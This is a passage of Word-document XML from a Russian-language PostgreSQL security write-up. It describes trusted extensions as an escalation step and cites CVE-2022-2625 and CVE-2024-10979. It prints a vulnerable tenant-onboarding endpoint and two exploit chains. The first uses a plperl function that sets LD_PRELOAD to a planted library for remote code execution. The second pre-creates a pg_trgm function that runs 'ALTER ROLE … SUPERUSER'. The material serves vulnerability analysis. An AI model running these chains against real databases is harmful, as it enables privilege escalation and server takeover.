          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — другой способ trojan-объекта, отрабатывающего под admin-привилегиями. Граница: 3.13.2 — через CREATE SCHEMA; 3.13.4 — через CREATE EXTENSION.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3.13.5 Trusted extensions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — расширение поверхности атаки: с PG 13 trusted extensions можно устанавливать без superuser, что делает CVE-2022-2625 эксплуатируемой целиком из user-роли (chain в 3.13.5).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общий принцип защиты: явная квалификация всех имён в DDL и в function bodies.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 3.7.2a / 3.7.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — финальные RCE-векторы, к которым эскалирует CVE-2022-2625.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4.2 (Хронология 2022)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общий контекст 11.08.2022 fixes.</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CVE-2022-2625 — https://www.postgresql.org/support/security/CVE-2022-2625/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EDB разбор: «PostgreSQL extensions impacted by CVE-2022-2625» — https://www.enterprisedb.com/blog/postgresql-extensions-impacted-cve-2022-2625-privilege-escalation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NIST NVD: CVE-2022-2625 — https://nvd.nist.gov/vuln/detail/CVE-2022-2625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«CREATE EXTENSION» — https://www.postgresql.org/docs/current/sql-createextension.html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«Packaging Related Objects into an Extension» — https://www.postgresql.org/docs/current/extend-extensions.html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14.5 Release notes (Security Fixes) — https://www.postgresql.org/docs/release/14.5/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R16 (sources/research.md, строки 254–259)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.13.5 Trusted extensions как ступень эскалации (R28)</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Начиная с PostgreSQL 13.0 (январь 2021) расширения в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_extension.control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-файле могут быть помечены как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">trusted = true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Trusted extension можно установить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не-superuser-ом</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, имеющим только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БД — без специальной predefined-role, без USAGE на конкретные системные функции. Сами по себе trusted extensions sandboxed (plperl, hstore, pg_trgm, citext и т.д. — около 24 в стандартном contrib), но они становятся </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ступенью эскалации</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в комбинации с другими CVE: атакующий с минимальной привилегией CREATE-on-DB устанавливает trusted extension и получает доступ к функциональности, через которую эксплуатирует следующий вектор.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В этой карточке — два конкретных chain. Третий, четвёртый и т.д. возможны по той же модели; общее правило в саммари 3.13.</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app/api/tenants/onboarding.py — multi-tenant SaaS-платформа</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get_tenant_admin_session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@router.post("/tenants/{tenant_id}/setup-search")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def enable_full_text_search(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tenant_id: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Depends(get_tenant_admin_session),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tenant_admin роль имеет CREATE на собственной БД (tenant_X_db),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # но не superuser. Self-service feature: тенант сам ставит pg_trgm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # для full-text search на своих таблицах.</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session.execute(text("CREATE EXTENSION IF NOT EXISTS pg_trgm"))</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session.execute(text("CREATE EXTENSION IF NOT EXISTS plperl"))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return {"status": "ok"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> имеет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своей БД, как у владельца БД.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 оба trusted, оба устанавливаются без superuser. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">legitimate self-service паттерн</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в SaaS-платформах с per-tenant databases (Crunchy Bridge, Supabase, отчасти RDS) — пока кто-то не воспользуется chain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Chain 1 — CREATE EXTENSION plperl + CVE-2024-10979</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Самый прямой путь к RCE без superuser, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">единственный из chains в этой категории, дающий полный OS-level execution</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(от tenant-admin или application-роли с CREATE на БД):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE EXTENSION plperl;  -- trusted, разрешено non-superuser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">USAGE на язык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после установки выдан PUBLIC автоматически (потому что trusted).</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(тот же роль, эксплуатация CVE-2024-10979 — детали в 3.7.2b):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE FUNCTION pg_temp.preload() RETURNS void LANGUAGE plperl AS $perl$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  $ENV{'LD_PRELOAD'} = '/tmp/x.so';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$perl$;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT pg_temp.preload();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ENV{...} = ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> до фикса CVE-2024-10979 (17.1 / 16.5 / 15.9 / 14.14 / 13.17 / 12.21) не блокируется trusted-sandbox.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Шаг 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (триггер через любой spawn-вектор):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY (SELECT '') TO PROGRAM 'true';  -- если есть pg_execute_server_program</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- или просто ждать autovacuum spawn</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Когда backend spawn-ит подпроцесс, LD_PRELOAD активируется, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/x.so</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> исполняется. RCE как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Полная карточка CVE-2024-10979</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (требования к версии, доставка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/x.so</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, post-exploitation) — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.7.2b</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делает trusted-extension chain особенным</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CREATE EXTENSION plperl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> атакующий не может писать plperl-функции. Tenant_admin без права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на untrusted-расширения был бы заблокирован. Trusted-флаг открывает путь к этому конкретному CVE для роли, которой раньше это было недоступно.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Chain 2 — CREATE EXTENSION (non-superuser) + CVE-2022-2625 pre-create</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Превращает CVE-2022-2625 (3.13.4) из «атаки на admin, ставящего extension» в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">полностью самостоятельную атаку non-superuser</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(от tenant-admin):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- pre-create функция с signature из install-script trusted extension</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE FUNCTION public.gin_extract_value_trgm(text, internal)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RETURNS internal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EXECUTE 'ALTER ROLE postgres_attacker SUPERUSER';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  RETURN NULL;</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schema — до PG 15 PUBLIC имеет CREATE на public, в upgrade-нутых кластерах PG 15+ также (поведение для новых только).</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(тот же role с CREATE на БД):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE EXTENSION pg_trgm;  -- trusted, ставится без superuser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">До фикса CVE-2022-2625</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PG ≤ 14.4 / 13.7 / 12.11 / 11.16 / 10.21):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- pg_trgm--N.sql содержит CREATE OR REPLACE FUNCTION public.gin_extract_value_trgm(...)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- Функция уже существует (создана атакующим)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
